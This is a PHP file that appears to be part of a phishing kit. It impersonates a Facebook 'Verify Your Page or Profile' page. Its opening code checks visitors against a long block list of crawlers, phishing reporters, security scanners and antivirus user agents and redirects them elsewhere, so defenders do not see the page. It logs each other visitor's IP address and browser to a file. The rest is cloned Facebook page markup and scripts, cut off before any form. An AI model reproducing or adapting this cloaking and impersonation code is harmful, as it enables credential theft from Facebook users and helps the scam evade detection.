<?php
error_reporting(0);
ini_set('display_errors', 0);
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
      $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
      $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
      $ipaddress = $_SERVER['REMOTE_ADDR'];
    }

$useragent = $_SERVER['HTTP_USER_AGENT'];
$data = "==1{$ipaddress}== ==2{$useragent}== ==3Facebook==";

require_once("../shadow.php");
$dp =  strtolower($_SERVER['HTTP_USER_AGENT']);
$blocked_words = array(
     "bot",
     "above",
     "google",
     "docomo",
     "mediapartners",
     "phantomjs",
     "lighthouse",
     "reverseshorturl",
     "samsung-sgh-e250",
     "softlayer",
     "amazonaws",
     "cyveillance",
     "crawler",
     "gsa-crawler",
     "phishtank",
     "dreamhost",
     "netpilot",
     "calyxinstitute",
     "tor-exit",
     "apache-httpclient",
     "lssrocketcrawler",
     "crawler",
     "urlredirectresolver",
     "jetbrains",
     "spam",
     "windows 95",
     "windows 98",
     "acunetix",
     "netsparker",
     "007ac9",
     "008",
     "Feedfetcher",
     "192.comagent",
     "200pleasebot",
     "360spider",
     "4seohuntbot",
     "50.nu",
     "a6-indexer",
     "admantx",
     "amznkassocbot",
     "aboundexbot",
     "aboutusbot",
     "abrave spider",
     "accelobot",
     "acoonbot",
     "addthis.com",
     "adsbot-google",
     "ahrefsbot",
     "alexabot",
     "amagit.com",
     "analytics",
     "antbot",
     "apercite",
     "aportworm",
     "EBAY",
     "CL0NA",
     "jabber",
     "ebay",
     "arabot",
     "hotmail!",
     "msn!",
     "baidu",
     "outlook!",
     "outlook",
     "msn",
     "duckduckbot",
     "hotmail",
     "go-http-client",
     "go-http-client/1.1",
     "trident",
     "presto",
     "virustotal",
     "unchaos",
     "dreampassport",
     "sygol",
     "nutch",
     "privoxy",
     "zipcommander",
     "neofonie",
     "abacho",
     "acoi",
     "acoon",
     "adaxas",
     "agada",
     "aladin",
     "alkaline",
     "amibot",
     "anonymizer",
     "aplix",
     "aspseek",
     "avant",
     "baboom",
     "anzwers",
     "anzwerscrawl",
     "crawlconvera",
     "del.icio.us",
     "camehttps",
     "annotate",
     "wapproxy",
     "translate",
     "feedfetcher",
     "ask24",
     "asked",
     "askaboutoil",
     "fangcrawl",
     "amzn_assoc",
     "bingpreview",
     "dr.web",
     "drweb",
     "bilbo",
     "blackwidow",
     "sogou",
     "sogou-test-spider",
     "exabot",
     "externalhit",
     "ia_archiver",
     "googletranslate",
     "translate",
     "proxy",
     "dalvik",
     "quicklook",
     "seamonkey",
     "sylera",
     "safebrowsing",
     "safesurfingwidget",
     "preview",
     "whatsapp",
     "telegram",
     "instagram",
     "zteopen",
     "icoreservice",
     "untrusted",
     "facebook",
    "abot",
    "dbot",
    "ebot",
    "hbot",
    "kbot",
    "lbot",
    "mbot",
    "nbot",
    "obot",
    "pbot",
    "rbot",
    "sbot",
    "tbot",
    "vbot",
    "ybot",
    "zbot",
    "bot.",
    "bot/",
    "_bot",
    ".bot",
    "/bot",
    "-bot",
    ":bot",
    "(bot",
    "crawl",
    "slurp",
    "spider",
    "seek",
    "avg",
    "avira",
    "bitdefender",
    "kaspersky",
    "sophos",
    "virustotal",
    "virus",
    "accoona",
    "acoon",
    "adressendeutschland",
    "ah-ha.com",
    "ahoy",
    "altavista",
    "ananzi",
    "anthill",
    "appie",
    "arachnophilia",
    "arale",
    "araneo",
    "aranha",
    "architext",
    "aretha",
    "arks",
    "asterias",
    "atlocal",
    "atn",
    "atomz",
    "augurfind",
    "backrub",
    "bannana_bot",
    "baypup",
    "bdfetch",
    "big brother",
    "biglotron",
    "bjaaland",
    "blackwidow",
    "blaiz",
    "blog",
    "blo.",
    "bloodhound",
    "boitho",
    "booch",
    "bradley",
    "butterfly",
    "calif",
    "cassandra",
    "ccubee",
    "cfetch",
    "charlotte",
    "churl",
    "cienciaficcion",
    "cmc",
    "collective",
    "comagent",
    "combine",
    "computingsite",
    "csci",
    "curl",
    "cusco",
    "daumoa",
    "deepindex",
    "delorie",
    "depspid",
    "deweb",
    "die blinde kuh",
    "digger",
    "ditto",
    "dmoz",
    "docomo",
    "download express",
    "dtaagent",
    "dwcp",
    "ebiness",
    "ebingbong",
    "e-collector",
    "ejupiter",
    "emacs-w3 search engine",
    "esther",
    "evliya celebi",
    "ezresult",
    "falcon",
    "felix ide",
    "ferret",
    "fetchrover",
    "fido",
    "findlinks",
    "fireball",
    "fish search",
    "fouineur",
    "funnelweb",
    "gazz",
    "gcreep",
    "genieknows",
    "getterroboplus",
    "geturl",
    "glx",
    "goforit",
    "golem",
    "grabber",
    "grapnel",
    "gralon",
    "griffon",
    "gromit",
    "grub",
    "gulliver",
    "hamahakki",
    "harvest",
    "havindex",
    "helix",
    "heritrix",
    "hku www octopus",
    "homerweb",
    "htdig",
    "html index",
    "html_analyzer",
    "htmlgobble",
    "hubater",
    "hyper-decontextualizer",
    "ia_archiver",
    "ibm_planetwide",
    "ichiro",
    "iconsurf",
    "iltrovatore",
    "image.kapsi.net",
    "imagelock",
    "incywincy",
    "indexer",
    "infobee",
    "informant",
    "ingrid",
    "inktomisearch.com",
    "inspector web",
    "intelliagent",
    "internet shinchakubin",
    "ip3000",
    "iron33",
    "israeli-search",
    "ivia",
    "jack",
    "jakarta",
    "javabee",
    "jetbot",
    "jumpstation",
    "katipo",
    "kdd-explorer",
    "kilroy",
    "knowledge",
    "kototoi",
    "kretrieve",
    "labelgrabber",
    "lachesis",
    "larbin",
    "legs",
    "libwww",
    "linkalarm",
    "link validator",
    "linkscan",
    "lockon",
    "lwp",
    "lycos",
    "magpie",
    "mantraagent",
    "mapoftheinternet",
    "marvin/",
    "mattie",
    "mediafox",
    "mediapartners",
    "mercator",
    "merzscope",
    "microsoft url control",
    "minirank",
    "miva",
    "mj12",
    "mnogosearch",
    "moget",
    "monster",
    "moose",
    "motor",
    "multitext",
    "muncher",
    "muscatferret",
    "mwd.search",
    "myweb",
    "najdi",
    "nameprotect",
    "nationaldirectory",
    "nazilla",
    "ncsa beta",
    "nec-meshexplorer",
    "nederland.zoek",
    "netcarta webmap engine",
    "netmechanic",
    "netresearchserver",
    "netscoop",
    "newscan-online",
    "nhse",
    "nokia6682/",
    "nomad",
    "noyona",
    "siteexplorer",
    "nutch",
    "nzexplorer",
    "objectssearch",
    "occam",
    "omni",
    "open text",
    "openfind",
    "openintelligencedata",
    "orb search",
    "osis-project",
    "pack rat",
    "pageboy",
    "pagebull",
    "page_verifier",
    "panscient",
    "parasite",
    "partnersite",
    "patric",
    "pear.",
    "pegasus",
    "peregrinator",
    "pgp key agent",
    "phantom",
    "phpdig",
    "picosearch",
    "piltdownman",
    "pimptrain",
    "pinpoint",
    "pioneer",
    "piranha",
    "plumtreewebaccessor",
    "pogodak",
    "poirot",
    "pompos",
    "poppelsdorf",
    "poppi",
    "popular iconoclast",
    "psycheclone",
    "publisher",
    "python",
    "rambler",
    "raven search",
    "roach",
    "road runner",
    "roadhouse",
    "robbie",
    "robofox",
    "robozilla",
    "rules",
    "salty",
    "sbider",
    "scooter",
    "scoutjet",
    "scrubby",
    "search.",
    "searchprocess",
    "semanticdiscovery",
    "senrigan",
    "sg-scout",
    "shai'hulud",
    "shark",
    "shopwiki",
    "sidewinder",
    "sift",
    "silk",
    "simmany",
    "site searcher",
    "site valet",
    "sitetech-rover",
    "skymob.com",
    "sleek",
    "smartwit",
    "sna-",
    "snappy",
    "snooper",
    "sohu",
    "speedfind",
    "sphere",
    "sphider",
    "spinner",
    "spyder",
    "steeler/",
    "suke",
    "suntek",
    "supersnooper",
    "surfnomore",
    "sven",
    "sygol",
    "szukacz",
    "tach black widow",
    "tarantula",
    "templeton",
    "/teoma",
    "t-h-u-n-d-e-r-s-t-o-n-e",
    "theophrastus",
    "titan",
    "titin",
    "tkwww",
    "toutatis",
    "t-rex",
    "tutorgig",
    "twiceler",
    "twisted",
    "ucsd",
    "udmsearch",
    "url check",
    "updated",
    "vagabondo",
    "valkyrie",
    "verticrawl",
    "victoria",
    "vision-search",
    "volcano",
    "voyager/",
    "voyager-hc",
    "w3c_validator",
    "w3m2",
    "w3mir",
    "walker",
    "wallpaper",
    "wanderer",
    "wauuu",
    "wavefire",
    "web core",
    "web hopper",
    "web wombat",
    "webbandit",
    "webcatcher",
    "webcopy",
    "webfoot",
    "weblayers",
    "weblinker",
    "weblog monitor",
    "webmirror",
    "webmonkey",
    "webquest",
    "webreaper",
    "websitepulse",
    "websnarf",
    "webstolperer",
    "webvac",
    "webwalk",
    "webwatch",
    "webwombat",
    "webzinger",
    "wget",
    "whizbang",
    "whowhere",
    "wild ferret",
    "worldlight",
    "wwwc",
    "wwwster",
    "xenu",
    "xget",
    "xift",
    "xirq",
    "yandex",
    "yanga",
    "yeti",
    "yodao",
    "zao/",
    "zippp",
    "zyborg",
    "proximic",
    "Googlebot",
    "Baiduspider",
    "Cliqzbot",
    "A6-Indexer",
    "AhrefsBot",
    "Genieo",
    "BomboraBot",
    "CCBot",
    "URLAppendBot",
    "DomainAppender",
    "msnbot-media",
    "Antivirus",
    "YoudaoBot",
    "MJ12bot",
    "linkdexbot",
    "Go-http-client",
    "presto",
    "BingPreview",
    "go-http-client",
     "go-http-client/1.1",
     "trident",
     "presto",
     "virustotal",
     "unchaos",
     "dreampassport",
     "sygol",
     "nutch",
     "privoxy",
     "zipcommander",
     "neofonie",
     "abacho",
     "acoi",
     "acoon",
     "adaxas",
     "agada",
     "aladin",
     "alkaline",
     "amibot",
     "anonymizer",
     "aplix",
     "aspseek",
     "avant",
     "baboom",
     "anzwers",
     "anzwerscrawl",
     "crawlconvera",
     "del.icio.us",
     "camehttps",
     "annotate",
     "wapproxy",
     "translate",
     "feedfetcher",
     "ask24",
     "asked",
     "askaboutoil",
     "fangcrawl",
     "amzn_assoc",
     "bingpreview",
     "dr.web",
     "drweb",
     "bilbo",
     "blackwidow",
     "sogou",
     "sogou-test-spider",
     "exabot",
     "externalhit",
     "ia_archiver",
     "mj12",
     "okhttp",
     "simplepie",
     "curl",
     "wget",
     "virus",
     "pipes",
     "antivirus",
     "python",
     "ruby",
     "avast",
     "firebird",
     "scmguard",
     "adsbot",
     "weblight",
     "favicon",
     "analytics",
     "insights",
     "headless",
     "github",
     "node",
     "agusescan",
     "zteopen",
     "majestic12",
     "SimplePie",
     "SAMSUNG-SGH-E250",
     "DoCoMo/2.0 N905i",
     "SiteLockSpider",
     "okhttp/2.5.0",
     "ips-agent",
     "scoutjet",
     "UptimeRobot",
     "FM Scene",
     "Prevx",
     "WindowsPowerShell"

);
    foreach($blocked_words as $word2) {
        if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == "    ") {
              header("Location: ".$ShadowUrl);
              exit();
        }
    }
$sendhits = "../../view.txt";
$x = fopen($sendhits, "a+");
fwrite($x, $data);
fclose($x);
?>
<html lang="en" data-autoid="autoid_1"><head><title>Verify Your Page or Profile</title><meta name="google" content="notranslate"><meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1"><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png" rel="shortcut icon" sizes="196x196"><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"><script id="u_0_e_HJ" nonce="">"use strict";window.MPageLoadClientMetrics=function(){var a=+new Date(),b={prelude_onload:["jewels_visible","first_paint","visibility_change","tti"],nav_started:["first_paint","visibility_change","prelude_onload"],first_paint:["jewels_visible","visibility_change","prelude_onload"],jewels_visible:["tti","visibility_change","navigation","prelude_onload"],tti:["e2e","visibility_change","navigation"]},c=3,d=3,e="nav_started",f=!0,g="",h="",i=1,j="",k="",l="",m="",n=function(){},o=!0,p=!1,q=!1,r=[],s=window.performance||window.msPerformance||window.webkitPerformance||{},t=(window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||window.setTimeout).bind(window),u=window.location.origin||window.location.protocol+"//"+window.location.hostname+(window.location.port&&":"+window.location.port);function v(b,c,d,e,f,i,n){s.timing&&s.timing.navigationStart&&(a=s.timing.navigationStart),j=b,k=c,l=d,m=e,g=f,h=i,o=n,y()}function w(a){var c=b[e];return c&&c.indexOf(a)!==-1}function x(a){return!b[a]}function y(){var a,b;document.hidden!==void 0?(a="hidden",b="visibilitychange"):document.mozHidden!==void 0?(a="mozHidden",b="mozvisibilitychange"):document.msHidden!==void 0?(a="msHidden",b="msvisibilitychange"):document.webkitHidden!==void 0&&(a="webkitHidden",b="webkitvisibilitychange");var c=function(){K("visibility_change",A()),document.removeEventListener(b,c),window.removeEventListener("beforeunload",c)};b&&a&&!window[a]?(document.addEventListener(b,c),window.addEventListener("beforeunload",c)):c()}function z(b){return b-a}function A(){return s.now?s.now():z(+new Date())}function B(){f&&(f=!1,n())}function C(){return f}function D(a){n=a}function E(){var a=i;++i;return a}function F(a){if(!window.navigator)return;window.navigator.hardwareConcurrency!==void 0&&(a.num_cores=window.navigator.hardwareConcurrency);window.navigator.deviceMemory&&(a.ram_gb=window.navigator.deviceMemory);window.navigator.connection&&(typeof window.navigator.connection.downlink==="number"&&(a.downlink_mb=window.navigator.connection.downlink),typeof window.navigator.connection.effectiveType==="string"&&(a.effective_connection_type=window.navigator.connection.effectiveType),typeof window.navigator.connection.rtt==="number"&&(a.rtt_ms=window.navigator.connection.rtt))}function G(b,c,d){if(!f)return;var g=!w(b),i=(c+a)/1e3;c=(i={lid:h,seq_num:E(),event:g?"illegal_transition":b,client_event_time:i,time_from_nav_start_ms:Math.floor(c)},i[l]=m,i.previous_event=e,i.log_to_scuba=o,i);e=b;j!==""&&(c.fb_dtsg=j);k!==""&&(c.lsd=k);g&&(c.illegal_transition_event=b);i=d||"";i!==""&&(c.navigation_endpoint=i);F(c);I(c)||J(c);(x(b)||g)&&B()}function H(a){var b=[];for(var c in a)b.push(c+"="+encodeURIComponent(a[c]));c=u+g;a=b.join("&");return c+"?"+a}function I(a){a.transmission_method="beacon";if(window.navigator&&window.navigator.sendBeacon)if(window.navigator.sendBeacon(H(a)))return!0;else a.is_retransmit=!0;return!1}function J(a,b){b===void 0&&(b=d);a.transmission_method="img";var c=new Image();b<d&&(a.is_retransmit=!0);b&&(c.onerror=function(c){J(a,b-1)});c.src=H(a)}function K(a,b,c){if(p){r.push({e:a,time:b,nav:c});return}G(a,b,c)}function L(a){if(!f)return;p=!0;var b=function(b){b=Math.min.apply(Math,[b].concat(r.map(function(a){return a.time})));p=!1;G("first_paint",b);(a||q)&&G("jewels_visible",b);r.forEach(function(a){return G(a.e,a.time,a.nav)})};t(function(){var a=A();if(s.getEntriesByName){var d=function(e){var f=s.getEntriesByName("first-paint")[0];f?b(f.startTime||a):e?window.setTimeout(function(){return d(!1)},c):b(a)};window.setTimeout(function(){return d(!0)},c)}else b(a)})}function M(){if(p){q=!0;return}G("jewels_visible",A())}function N(){G("prelude_onload",A())}return{init:v,logFirstPaint:L,logJewelsVisible:M,logPreludeOnload:N,logEvent:K,getMSFromNavStart:A,isEnabled:C,currentTimeToNavStartDelta:z,setDisableCallback:D,disable:B,origin:u}}();MPageLoadClientMetrics.init("AQFipefCVenD048:17:1648372223", "", "jazoest", "21962", "\/ajax\/mtouch_perf_page_load_timings\/", "7079704837109214812-0", false);</script><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/cfy1qwFFg9w.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="QgfUBa5"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/CjfcwDhqANJ.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="0lu+WFi"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0,cross/xA6tPSipJh3.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="oy0uzo+"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/UYlX9pI2NhG.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="Vuff6Su"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/78tYy2-SVNf.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="k8op+XT"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/6PCsQ334qnA.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="sykFmfw"><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/XTXuAMFiwGs.css?_nc_x=IqwH59e_Ga0" data-bootloader-hash="tDDXq/O"><script id="u_0_f_O/" nonce="">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"stratcom_event_profiler_hook":"1","timeslice_heartbeat_config":{"pollIntervalMs":33,"idleGapThresholdMs":60,"ignoredTimesliceNames":{"requestAnimationFrame":true,"Event listenHandler mousemove":true,"Event listenHandler mouseover":true,"Event listenHandler mouseout":true,"Event listenHandler scroll":true},"isHeartbeatEnabled":true,"isArtilleryOn":false},"shouldLogCounters":true,"timeslice_categories":{"react_render":true,"reflow":true},"sample_continuation_stacktraces":true,"dom_mutation_flag":true});</script><script nonce="">document.domain = 'facebook.com';/^#~?!(?:\/?[\w\.-])+\/?(?:\?|$)/.test(location.hash)&&location.replace(location.hash.substr(location.hash.indexOf("!")+1));</script><script nonce="">__DEV__=0;</script><script id="u_0_g_CP" src="https://static.xx.fbcdn.net/rsrc.php/v3/y5/r/Fb9AtEyv6f3.js?_nc_x=IqwH59e_Ga0" data-bootloader-hash="CcHAorE" nonce=""></script><script id="u_0_h_ce" nonce="">MPageLoadClientMetrics.logPreludeOnload();</script><script id="u_0_c_8Q" nonce="">CavalryLogger=window.CavalryLogger||function(a){this.lid=a,this.transition=!1,this.metric_collected=!1,this.is_detailed_profiler=!1,this.instrumentation_started=!1,this.pagelet_metrics={},this.events={},this.ongoing_watch={},this.values={t_cstart:window._cstart},this.piggy_values={},this.bootloader_metrics={},this.resource_to_pagelet_mapping={},this.initializeInstrumentation&&this.initializeInstrumentation()},CavalryLogger.prototype.setIsDetailedProfiler=function(a){this.is_detailed_profiler=a;return this},CavalryLogger.prototype.setTTIEvent=function(a){this.tti_event=a;return this},CavalryLogger.prototype.setValue=function(a,b,c,d){d=d?this.piggy_values:this.values;(typeof d[a]==="undefined"||c)&&(d[a]=b);return this},CavalryLogger.prototype.getLastTtiValue=function(){return this.lastTtiValue},CavalryLogger.prototype.setTimeStamp=CavalryLogger.prototype.setTimeStamp||function(a,b,c,d){this.mark(a);var e=this.values.t_cstart||this.values.t_start;e=d?e+d:CavalryLogger.now();this.setValue(a,e,b,c);this.tti_event&&a==this.tti_event&&(this.lastTtiValue=e,this.setTimeStamp("t_tti",b));return this},CavalryLogger.prototype.mark=typeof console==="object"&&console.timeStamp?function(a){console.timeStamp(a)}:function(){},CavalryLogger.prototype.addPiggyback=function(a,b){this.piggy_values[a]=b;return this},CavalryLogger.instances={},CavalryLogger.id=0,CavalryLogger.getInstance=function(a){typeof a==="undefined"&&(a=CavalryLogger.id);CavalryLogger.instances[a]||(CavalryLogger.instances[a]=new CavalryLogger(a));return CavalryLogger.instances[a]},CavalryLogger.setPageID=function(a){if(CavalryLogger.id===0){var b=CavalryLogger.getInstance();CavalryLogger.instances[a]=b;CavalryLogger.instances[a].lid=a;delete CavalryLogger.instances[0]}CavalryLogger.id=a},CavalryLogger.now=function(){return window.performance&&performance.timing&&performance.timing.navigationStart&&performance.now?performance.now()+performance.timing.navigationStart:new Date().getTime()},CavalryLogger.prototype.measureResources=function(){},CavalryLogger.prototype.profileEarlyResources=function(){},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){},CavalryLogger.start_js=function(){},CavalryLogger.start_js_script=function(){},CavalryLogger.done_js=function(){};CavalryLogger.getInstance().setTTIEvent("t_domcontent");CavalryLogger.prototype.measureResources=function(a,b){if(!this.log_resources)return;var c="bootload/"+a.name;if(this.bootloader_metrics[c]!==void 0||this.ongoing_watch[c]!==void 0)return;var d=CavalryLogger.now();this.ongoing_watch[c]=d;"start_"+c in this.bootloader_metrics||(this.bootloader_metrics["start_"+c]=d);b&&!("tag_"+c in this.bootloader_metrics)&&(this.bootloader_metrics["tag_"+c]=b);if(a.type==="js"){c="js_exec/"+a.name;this.ongoing_watch[c]=d}},CavalryLogger.prototype.stopWatch=function(a){if(this.ongoing_watch[a]){var b=CavalryLogger.now(),c=b-this.ongoing_watch[a];this.bootloader_metrics[a]=c;var d=this.piggy_values;a.indexOf("bootload")===0&&(d.t_resource_download||(d.t_resource_download=0),d.resources_downloaded||(d.resources_downloaded=0),d.t_resource_download+=c,d.resources_downloaded+=1,d["tag_"+a]=="_EF_"&&(d.t_pagelet_cssload_early_resources=b));delete this.ongoing_watch[a]}return this},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){var a={};Object.values(window.CavalryLogger.instances).forEach(function(b){b.bootloader_metrics&&Object.assign(a,b.bootloader_metrics)});return a},CavalryLogger.start_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("js_exec/"+a[b])},CavalryLogger.start_js_script=function(a){if(!a||!a.dataset)return;CavalryLogger.start_js([a.dataset.bootloaderHash||a.dataset.bootloaderHashClient])},CavalryLogger.done_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("bootload/"+a[b])},CavalryLogger.prototype.profileEarlyResources=function(a){for(var b=0;b<a.length;b++)this.measureResources({name:a[b][0],type:a[b][1]?"js":""},"_EF_")};CavalryLogger.getInstance().log_resources=true;CavalryLogger.getInstance().setIsDetailedProfiler(true);window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp("t_start");</script><script id="u_0_d_fg" nonce="">(function _(a,b,c,d){function e(a){document.cookie=a+"=;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/;domain=.facebook.com"}function f(a,b){document.cookie=a+"="+b+";path=/;domain=.facebook.com;secure"}if(!a){e(b);e(c);return}a=null;(navigator.userAgent.indexOf("Firefox")!==-1||!window.devicePixelRatio&&navigator.userAgent.indexOf("Windows Phone")!==-1)&&(document.documentElement!=null&&(a=screen.width/document.documentElement.offsetWidth,a=Math.max(1,Math.floor(a*2)/2)));(!a||a===1)&&navigator.userAgent.indexOf("IEMobile")!==-1&&(a=Math.sqrt(screen.deviceXDPI*screen.deviceYDPI)/96,a=Math.max(1,Math.round(a*2)/2));f(b,(a||window.devicePixelRatio||1).toString());e=window.screen?screen.width:0;b=window.screen?screen.height:0;f(c,e+"x"+b);d&&document.cookie&&window.devicePixelRatio>1&&document.location.reload()})(true, "m_pixel_ratio", "wd", false);</script><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials"><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/uqFCPZu4BB9.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/uqFCPZu4BB9.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="1GzRKWC"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/JOVw7FP3IdA.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/JOVw7FP3IdA.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="/6ajLJK"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/6yzFRRzYsZb.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/6yzFRRzYsZb.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="IsQZRlw"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/2jr_tFUjDMy.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/2jr_tFUjDMy.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="bJ922yg"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3i8594/y3/l/en_US/g2jtnOgcf-j.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3i8594/y3/l/en_US/g2jtnOgcf-j.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="n35cwAF"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/ilMFccLWbov.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/ilMFccLWbov.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="FJqL2Al"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/rmE_4NsJm4a.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/rmE_4NsJm4a.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="prwoyZP"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3iooI4/yf/l/en_US/UCanXjOuttN.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3iooI4/yf/l/en_US/UCanXjOuttN.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="RO0pHC2"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3ilqt4/yp/l/en_US/nsUyoi4BsfM.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3ilqt4/yp/l/en_US/nsUyoi4BsfM.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="WLcinoG"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3iJMr4/yB/l/en_US/4MUKuAk9Faq.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3iJMr4/yB/l/en_US/4MUKuAk9Faq.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="KjISTxl"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3ih-D4/yT/l/en_US/rDkjJ8n2bFN.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3ih-D4/yT/l/en_US/rDkjJ8n2bFN.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="KL2Ev9+"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/XLbnXgAgtPB.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/XLbnXgAgtPB.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="JJZ5vsB"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/mnsr3a33Qz-.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/mnsr3a33Qz-.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="5i4yS7A"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/n-ApPpuEI8K.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/n-ApPpuEI8K.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="eQE/lWy"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3ijfq4/y2/l/en_US/IPFXibTBn5v.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3ijfq4/y2/l/en_US/IPFXibTBn5v.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="qwAZCkc"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/HRoaPibbahM.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/HRoaPibbahM.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="t1KEUNA"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/KWY7Edb5_DT.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/KWY7Edb5_DT.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="FEt5GzN"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/YvcV_hOY251.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/YvcV_hOY251.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="WSnCXIu"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/LS7kGQIR1Bo.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/LS7kGQIR1Bo.js?_nc_x=IqwH59e_Ga0" async="" data-bootloader-hash-client="PHeKYkw"></script><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/ngoBhFBLB-O.js?_nc_x=IqwH59e_Ga0" rel="preload" as="script"><script 